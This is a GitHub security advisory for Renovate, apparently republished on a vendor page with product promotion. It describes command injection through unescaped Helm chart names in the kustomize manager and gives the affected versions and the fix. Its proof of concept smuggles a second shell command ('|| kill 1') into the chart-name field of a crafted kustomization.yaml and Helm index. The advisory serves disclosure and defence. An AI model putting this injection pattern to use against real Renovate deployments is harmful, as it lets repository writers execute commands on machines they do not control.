GHSA-xv56-3wq5-9997
MEDIUMRenovate vulnerable to arbitrary command injection via kustomize manager and malicious helm repository
Blast Radius
Weekly download volume for affected packages — a proxy for how broadly this vulnerability is deployed.
renovatenpmDescription
Summary
The user-provided chart name in the kustomize manager is appended to the helm pull --untar command without proper sanitization.
Details
Adversaries can provide a maliciously crafted kustomization.yaml in conjunction with a Helm repo's index.yaml file to trick Renovate to execute arbitrary code.
The value for the depName argument for the helmRepositoryArgs function in lib/modules/manager/kustomize/artifacts.ts is not being escaped using the quote function from the shlex package.
This lack of proper sanitization has been present in the product since version 39.218.9 (https://github.com/renovatebot/renovate/commit/cc08c6e98f19e6258c5d3180c70c98e1be0b0d37), released on March 26 of 2025.
PoC
- Create a mock Helm repository. Have its
index.yamlendpoint return:
apiVersion: v1
entries:
"example || kill 1; echo":
- version: 1.0.1
created: 2016-10-06T16:23:20.499814565-06:00
- version: 1.0.0
created: 2016-10-06T16:23:20.499543808-06:00
- Create a git repo with the following content:
renovate.json5:
{
$schema: "https://docs.renovatebot.com/renovate-schema.json",
postUpdateOptions: [
"kustomizeInflateHelmCharts",
]
}
kustomization.yaml:
kind: Kustomization
apiVersion: kustomize.config.k8s.io/v1beta1
helmCharts:
- name: "example || kill 1; echo"
repo: TODO reference the mocked Helm repository over https
version: 1.0.0
with the todo resolved
charts/.gitkeep:
(empty)
- Run Renovate against the repo from a Docker container. Notice that the process terminates without reporting "Repository finished", because the ACI vulnerability allowed for execution of
kill 1, terminating the root process of the container.
Impact
This is a Arbitrary Command Injection vulnerability, allowing those with write access on repositories configured to be scanned by Renovate to cause the execution of commands of their choice on the machine that runs Renovate.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 📦npm | renovate | ≥ 39.218.0&&< 40.33.0 | 40.33.0 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for renovate. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update renovate to 40.33.0 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-xv56-3wq5-9997 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-xv56-3wq5-9997 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-xv56-3wq5-9997. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-xv56-3wq5-9997 in your dependencies?
O3 detects GHSA-xv56-3wq5-9997 across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.